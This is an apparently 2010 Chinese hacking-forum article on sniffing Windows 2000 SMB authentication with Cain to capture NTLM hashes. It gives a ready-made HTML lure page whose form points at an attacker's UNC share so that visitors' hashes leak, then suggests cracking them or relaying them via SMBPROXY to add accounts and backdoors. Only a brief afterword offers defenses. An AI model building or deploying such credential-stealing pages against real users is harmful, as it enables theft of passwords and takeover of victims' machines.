您的位置:首页网络冲浪黑客天空 → 非主流入侵之会话劫持winnt/2k HASH的深入研究

非主流入侵之会话劫持winnt/2k HASH的深入研究

时间:2010/1/18 11:51:00来源:本站整理作者:我要评论(0)

非主流入侵之会话劫持winnt/2k HASH的深入研究:

      自从上次发布了SMBPROXY的测试动画后,就有网友问我:“能否通过网页抓取浏览者的HASH值?”因为SMBPROXY只认可pwdump格式的密码信息,其他格式都不行,所以如果通过构造一个特殊的网页,能够抓取浏览者的HASH值,并能转化为PWDUMP认可的格式,那么我们就有可能完全控制浏览者的机器。
 
 第一次听说XHACKER和HAOWAWA通过网页抓HASH的时候,觉得不太可能,第2天跑到他们论坛里翻了一遍,也没有找到相关的帖子,没办法,只好自己动脑子了。以往获取HASH的方法就是入侵到对方机器里,抓取SAM,然后用LC4暴力破解,还有就是用PWDUMP抓,不过这2种方法需要的条件都比较苛刻。本来想了好久也没有头绪,昨天看到小雨兄写的帖子,里面提到了CAIN这个工具,忽然记起来以前在3389肉鸡上通过IPC到自己机器上拷工具的时候,CAIN的SNIFFER模式就记录下一些SMB会话过程。里面包含TIME,SMB SERVER,CLIENT,USERNAME,DOMAIN,LN HASH,NT HASH,NT SERV-CHALL,LM CLI-CHALL,SESSION KEY以及登陆结果。虽然当时只提交了一次验证过程,可是往往嗅探到很多次SMB会话。考虑到这可能就是问题的突破口,我再次登陆到肉鸡上,并将这次的过程详细记录下来:
  先打开自己机器上CAIN的SNIFFER模式。登陆到3389肉鸡上(登陆时用户名是USER,密码是1982),进去后在“开始”--“运行”里填上“\\218.197.248.212\C$" (这里218.197.248.212是我自己机器的IP),很快弹出熟悉的验证框,上面填用户名,下面是对应的密码。虽然这时候我还没填任何资料,不过本地机器上已经嗅探到了12个SMB会话,其中SMB SERVER一栏都是我的IP,CLIENT都是肉鸡的IP,USERMANE的名字则是USER,DOMAIN栏是肉鸡的机器名。这里的12个会话结果都是失败。当我用ADMINISTRATOR(密码是753951,这个用户是我自己机器上的管理员帐号)进入自己C盘的时候,CAIN又嗅探到一个SMB会话过程,用户名是和前面的不同,是ADMINISTRATOR,而这次的登陆结果显示成功。此时我们感兴趣的是前面的12个会话过程是如何建立的,那些嗅到的HASH值破解出来的密码究竟会是什么?我用CAIN把这12个值全部导入CRACKER,选择“TEST PASSWORD”一项,当密码填入1982的时候,显示密码破解成功,虽然这12个会话里的HASH值都不一样,但是实质上密码都是1982。到了这里,可以猜测到WIN2K验证机制如下:当一台WIN2K主机企图访问另外一台WIN2K机器共享资源的时候,会先发出登陆请求,假设此时请求主机上用户名是ABC,密码是123,它会先用ABC(123)尝试登陆远程主机,当发现密码错误不能登陆的时候,再弹出我们常见的验证框,让用户自己填用户名和密码。知道了这个原理,我先用ABC(密码123)登陆到远程主机,再“开始”--“运行”里填“\\218.197.248.212\c$",很快出现了验证框,点击取消,然后在自己机器上建立一个管理员,帐号密码也是ABC(123),此时再重复上面的行为,这次不需要验证,直接进入我的C盘!
 为了再次验证自己的想法,假设知道218.197.248.253的ADMINISTRATOR的密码是123456,我把自己ADMINISTRATOR密码改成123456,注销后再登陆,当输入“\\218.197.248.253\C$"时,不需要任何验证过程,也可以直接进入对方硬盘!
  既然知道如上的原理,我们可以构造如下的网页
<html>
<title>本网页可以抓取你的HASH</title>
<p><p align=center>
<form action="\\218.197.248.212\c$"><input type="submit" value="点击这里我就可以获取你的HASH值"></form>
</body>
</html>
这里218.197.248.212必须是装了嗅探器的主机。当用户浏览这个网页的时候,一旦提交了按钮事件,就会连接到嗅探机器的某共享资源,而此时浏览者的HASH就会被截取了,我用的是CAIN抓HASH,抓取后可以直接导入CRACKER,然后暴力破解出密码。如果哪位能把这里HASH值转化成PWDUMP格式,都不需要破解,直接利用SMBPROXY加用户,做后门。。。。。。
 

后记:
这里我给出的只是一个思路,大家可以把这种特殊网页构造得更加完善,这里引用小雨兄的建议,小雨该不会介意吧:
禁用smb服务,最少服务=最大安全,还是不败的神化
如果启动,推荐使用至少ver2的认证,最好是lever3
使用别名帐户,比如user权限的用户,即使被破掉密码,权限低一点总是好的!
定期查看审核日志(细心管理员该做的,看看,有没有可疑的分析)
警惕陌生人的email或者web页面,注意file://url的诱惑
 

相关阅读 明日之后研究资料商店在哪阿瑞斯病毒研究所怎么快速过关 0肝快速通关技巧详解魔力宝贝手机版真中的研究任务是什么 魔力宝贝手机版真中的研究任又一个案子解决了受限制的研究怎么过 受限制的研究案件攻略图解冒险岛2极光研究所黄金宝箱在哪 冒险岛2极光研究所黄金宝箱位置一冒险岛2msi机械研究所黄金宝箱在哪 冒险岛2msi机械研究所黄金箱子冒险岛手游玛加提亚研究所隐藏地图怎么去 玛加提亚研究所隐藏地图智能电视也不安全 34款智能电视/盒子现场被破解

文章评论
发表评论

热门文章 黑客大战直播网址 黑客

最新文章 黑客大战直播网址 黑客什么是木马,什么是木马 计算机病毒是指什么什么是木马,什么是木马病毒黑客破解密码常用的方法告诉你黑客的Google搜索技巧

人气排行 如何攻击局域网电脑无线网络密码破解教程(破解无线路由WEP加密网站获得系统权限攻击教程流光破解ftp密码教程计算机病毒是指什么黑客破解密码常用的方法如何命令行/DOS下列出进程名与进程文件路径2010黑客工具